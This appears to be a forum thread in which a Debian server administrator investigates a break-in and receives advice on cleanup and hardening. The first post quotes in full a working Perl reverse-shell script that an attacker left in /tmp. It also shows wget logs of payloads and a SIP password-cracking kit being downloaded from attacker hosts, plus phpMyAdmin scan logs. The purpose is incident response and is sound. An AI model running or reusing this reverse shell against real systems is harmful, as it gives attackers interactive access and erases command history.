Noticed some issues with services down on my box and started looking through my logs. It appears that the machine has been hacked and I'm still trying to see if it is with a particular site or how they got in. I did find a file named back.txt that was just sitting in the /tmp directory. Code: #!/usr/bin/perl use IO::Socket; $system = '/bin/bash'; $ARGC=@ARGV; print "--== messing Machine ==-- \n\n"; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Spawning Shell \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "--== Thuraya Team ==-- \n\n"; system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo; echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); system($system); I also see a lot of this in the logs Code: 72.249.74.26 - - [20/Sep/2010:23:50:04 -0500] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 364 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:08 -0500] "GET /admin/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:14 -0500] "GET /db/scripts/setup.php HTTP/1.1" 404 343 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 348 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /mysql/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 351 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 357 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /phpadmin/scripts/setup.php HTTP/1.1" 404 349 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 351 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 352 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 404 344 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 355 "-" "ZmEu" 72.249.74.26 - - [20/Sep/2010:23:50:26 -0500] "GET /web/scripts/setup.php HTTP/1.1" 404 344 "-" "ZmEu" This seems to be a pretty common attack while searching the internet, but something seems to have clearly got access based on the file in tmp. Here is where I found the reference to back.txt, looks like it was grabbed from FTP: Code: --10:18:55-- ftp://lifepark:*password*@61.220.169.154/.trash/robot.txt => `robot.txt' Connecting to 61.220.169.154:21... connected. Logging in as lifepark ... Logged in! ==> SYST ... done. ==> PWD ... done. ==> TYPE I ... done. ==> CWD /.trash ... done. ==> PASV ... done. ==> RETR robot.txt ... done. 0K .......... ...... 25.11 KB/s 10:18:58 (25.11 KB/s) - `robot.txt' saved [17177] kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec] join: missing operand Try `join --help' for more information. sh: http://mysql.gwshack.us/back.txt: No such file or directory sh: http://mysql.gwshack.us/back.txt: No such file or directory --10:32:13-- http://mysql.gwshack.us/back.txt => `back.txt' Resolving mysql.gwshack.us... 213.251.132.191 Connecting to mysql.gwshack.us|213.251.132.191|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 892 [text/plain] 0K 100% 121.53 MB/s 10:32:14 (121.53 MB/s) - `back.txt' saved [892/892] This is a debian4 box that is updated along with the latest ISPconfig updates. One site is running wordpress which is also updated so I'm not sure where the vulnerability is. Any suggestions on which direction to move at this point to look for holes and clean things up?
First of all I'd run chkrootkit and rkhunter to see if there are any rootkits on your system. Then make sure that all your web applications (Wordpress, Joomla, etc.) are up to date.
Found a lot of new files today in /tmp. The owner of all appears to be www-data Code: ls -la total 1400 drwxrwxrwt 8 root root 4096 Sep 22 16:55 . drwxr-xr-x 22 root root 4096 Sep 21 21:08 .. drwxrwxrwt 2 root root 4096 Sep 21 21:08 .ICE-unix drwxrwxrwt 2 root root 4096 Sep 21 21:08 .X11-unix drwxr-xr-x 2 www-data www-data 4096 Sep 22 14:44 .session drwxr-xr-x 6 www-data www-data 4096 Mar 26 08:48 .svn -rwxr-xr-x 1 www-data www-data 4834 Mar 26 08:48 Changelog -rwxr-xr-x 1 www-data www-data 1361 Mar 26 08:48 README -rwxr-xr-x 1 www-data www-data 308 Mar 26 08:48 THANKS -rwxr-xr-x 1 www-data www-data 80 Mar 26 08:48 TODO -rwxr-xr-x 1 www-data www-data 2429 Sep 22 14:42 a -rwxr-xr-x 1 www-data www-data 36898 Sep 2 04:27 bfp -rwxr-xr-x 1 www-data www-data 20887 Sep 2 04:27 bfr drwxr-xr-x 5 www-data www-data 4096 Sep 2 04:27 bfr-1.6 -rwxr-xr-x 1 www-data www-data 2010 Mar 26 09:18 crack -rwxr-xr-x 1 www-data www-data 65431 Sep 5 13:17 dictionar -rwxr-xr-x 1 www-data www-data 18 Sep 6 12:15 email srwx------ 1 root root 0 Sep 21 21:09 fail2ban.sock -rwxr-xr-x 1 www-data www-data 12175 Mar 26 08:48 fphelper.py -rwxr-xr-x 1 www-data www-data 12288 Mar 26 08:48 groupdb -rwxr-xr-x 1 www-data www-data 36772 Mar 26 08:48 helper.py -rwxr-xr-x 1 www-data www-data 36024 Mar 26 08:48 helper.pyc -rwxr-xr-x 1 www-data www-data 1833 Mar 26 09:18 install -rwxr-xr-x 1 www-data www-data 143 Mar 26 08:48 kill -rwxr-xr-x 1 www-data www-data 568 Mar 26 09:18 lib.sh -rwxr-xr-x 1 www-data www-data 4298 Mar 26 08:48 pptable.py -rwxr-xr-x 1 www-data www-data 4998 Mar 26 08:48 pptable.pyc -rwxr-xr-x 1 www-data www-data 4229 Mar 26 08:48 regen.py drwxr-xr-x 2 www-data www-data 4096 Mar 26 08:48 results -rwxr-xr-x 1 www-data www-data 1509 Mar 26 09:18 scan -rwxr-xr-x 1 www-data www-data 512766 Sep 6 14:17 sip.tgz -rwxr-xr-x 1 www-data www-data 110592 Mar 26 08:48 staticfull -rwxr-xr-x 1 www-data www-data 282624 Mar 26 08:48 staticheaders -rwxr-xr-x 1 www-data www-data 749 Mar 26 08:48 sv.xsl -rwxr-xr-x 1 www-data www-data 22222 Mar 26 08:48 svcrack.py -rwxr-xr-x 1 www-data www-data 9159 Mar 26 08:48 svlearnfp.py -rwxr-xr-x 1 www-data www-data 24601 Mar 26 08:48 svmap.py -rwxr-xr-x 1 www-data www-data 12852 Mar 26 08:48 svreport.py -rwxr-xr-x 1 www-data www-data 26016 Mar 26 08:48 svwar.py -rwxr-xr-x 1 www-data www-data 6152 Sep 2 04:27 timeout -rwxr-xr-x 1 www-data www-data 1619 Mar 26 08:48 timeout.c -rwxr-xr-x 1 www-data www-data 45056 Mar 26 08:48 totag Take a look at the readme Code: cat README Welcome to SIPVicious security tools. The 4 tools that you should be looking at are: - svmap - svwar - svcrack - svreport The tools: svmap - this is a sip scanner. When launched against ranges of ip address space, it will identify any SIP servers which it finds on the way. Also has the option to scan hosts on ranges of ports. svwar - identifies working extension lines on a PBX. A working extension is one that can be registered. Also tells you if the extension line requires authentication or not. svcrack - a password cracker making use of digest authentication. It is able to crack passwords on both registrar servers and proxy servers. Current cracking modes are either numeric ranges or words from dictionary files. svreport - able to manage sessions created by the rest of the tools and export to pdf, xml, csv and plain text. svlearnfp - allows you to generate new fingerprints by simply running the tool against a host. It will attempt to guess most values and allow you to save the information to the local fingerprint db. Then you can choose to upload it to the author so that it can be added to the database. For usage help make use of -h or --help switch. Also check out the wiki: http://code.google.com/p/sipvicious/w/list And if you're stuck you're welcome to contact the author. Sandro Gauci sandrogauc at gmail dot com Rkhunter isn't finding anything. System is always up-to-date, wordpress is newest version and only running on 1 site with suexec.
Fail2ban Was the Fail2ban intrusion prevention framework installed? It's one of the recommended steps for ISPConfig (see The Perfect Server, page 4, #16 Install fail2ban). On ISPConfig 3: Monitor -> Logfiles -> Show fail2ban-Log
Yes, fail2ban is installed. Looks like this is coming from japan, or at least the server the files were downloaded from. In /var/log/apache2/error.log I see Code: --14:41:25-- http://61.115.230.118/icons/sip.tgz => `sip.tgz' Connecting to 61.115.230.118:80... connected. HTTP request sent, awaiting response... 200 OK Length: 512,766 (501K) [application/x-gzip] 0K .......... .......... .......... .......... .......... 9% 8.68 KB/s 50K .......... .......... .......... .......... .......... 19% 3.48 KB/s 100K .......... .......... .......... .......... .......... 29% 7.66 KB/s 150K .......... .......... .......... .......... .......... 39% 4.19 KB/s 200K .......... .......... .......... .......... .......... 49% 5.63 KB/s 250K .......... .......... .......... .......... .......... 59% 7.58 KB/s 300K .......... .......... .......... .......... .......... 69% 7.43 KB/s 350K .......... .......... .......... .......... .......... 79% 4.90 KB/s 400K .......... .......... .......... .......... .......... 89% 8.46 KB/s 450K .......... .......... .......... .......... .......... 99% 13.72 KB/s 500K 100% 1.31 MB/s 14:42:52 (6.22 KB/s) - `sip.tgz' saved [512766/512766] Code: whois 61.115.230.118 [ JPNIC database provides information regarding IP address and ASN. Its use ] [ is restricted to network administration purposes. For further information, ] [ use 'whois -h whois.nic.ad.jp help'. To only display English output, ] [ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ] Network Information: a. [Network Number] 61.115.230.0/24 b. [Network Name] AT-LINKNET g. [Organization] Link Incorporated m. [Administrative Contact] GO004JP n. [Technical Contact] YI1082JP p. [Nameserver] dns1.atworks.co.jp p. [Nameserver] ns02.idc.jp p. [Nameserver] ns03.idc.jp [Assigned Date] 2001/04/12 [Return Date] [Last Update] 2005/04/14 18:59:04(JST) Less Specific Info. ---------- Yahoo Japan Corporation [Allocation] 61.115.224.0/20 More Specific Info. ---------- No match!!
grep through your apache logs for words like wget, curl, tar, exec, perl, and so on. They will most likely be using a script vulnerability to download, unpack, and run the files. That should show up what is being exploited. Also manually scroll through the logs at around the time you see that those files were downloaded. That may also give you some hints.
As the files are owned by www-data and rkhunter is not showing any problems, it might be that the hackers did not got root priveliges yet. There had been a few vulnerabilities in phpmyadmin in the last months and your log output shows that they serached for phpmyadmin, so it might be that they went in trough phpmyadmin. You wrote above that this is a debian 4 system. I recommend that you update it to debian 5. There is a howto from falko available here at howtoforge that describes the debian 4 to 5 update procedure. before you update, remove phpmyadmin wth: apt-get remove --purge phpmyadmin and reinstall it after the update with: apt-get install phpmyadmin. You should also remove all these files in /tmp and then check your server in the next days if you see any anomal behaviours or higher load. You can check your server also with a portscanner from a external other system to see if any ports are opened that you dont wanted to be open.
Get time stamp of that entry in error log. Then try to match the error to a request in the access log so you can see what page they exploited to make it download this sip.tgz. Do the same thing with the file dates in /tmp Match the creation times to requests in access log.
Things have been ok since deleting all files that were downloaded. I went ahead and did an upgrage from etch to lenny today. The only concern I have is that it doesn't look like the kernel was upgraded. Code: uname -r 2.6.18-128.1.1.el5.028stab062.3 Any downside to using an older kernel? Debian version shows as lenny Code: cat /etc/debian_version 5.0.6 I'm just a little nervous about trying to upgrade the kernel on a remote system.
I would be concerned that there may be a security vulnerability in the old kernel. This seems like a good guide on performing the upgrade including the kernel: http://www.debianadmin.com/howto-upgrade-from-debian-etch-40-to-lenny-50.html
